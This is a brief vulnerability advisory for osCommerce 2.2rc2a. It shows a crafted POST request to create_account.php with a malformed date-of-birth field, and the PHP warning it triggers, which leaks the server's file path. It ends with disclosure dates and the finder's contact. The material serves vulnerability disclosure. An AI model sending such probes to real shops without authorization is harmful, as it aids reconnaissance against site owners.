osCommerce version 2.2rc2a suffers from an information disclosure vulnerability.
e83060bf47d164489717852d1a3a79a00be142c4234277d1607a6d9bd3bcab5e
Application: osCommerce 2.2rc2a
Authors Site: http://www.oscommerce.com/
+--------------------------------------------------------------+
Information Disclosure:
Manipulation of the 'DOB' Variable on create_account.php can cause
information disclosure:
In this example the POST variable 'DOB' has been set to: FOOBAR
POST /oscommerce/create_account.php
action=process&gender=m&firstname=john&lastname=smith&dob=FOOBAR&email_addre
ss=email@address.com&company=foobar&street_address=foobar&suburb=foobar&post
code=foobar&city=foobar&state=foobar&country=1&telephone1=123456789&fax=1234
56789&newsletter=on&password=foobar&confirmation=foobar
Result:
Warning: checkdate() expects parameter 3 to be long, string given in
/var/www/oscommerce/create_account.php on line 80
+-[Notes:]-----------------------------------------------------+
Vulnerabilities found on: 05/09/2008
Author(s) Informed on: 06/09/2008
Author(s) Response: None Yet
Author(s) Fix: None Yet
JohnC@NoBytes.com
http://www.NoBytes.com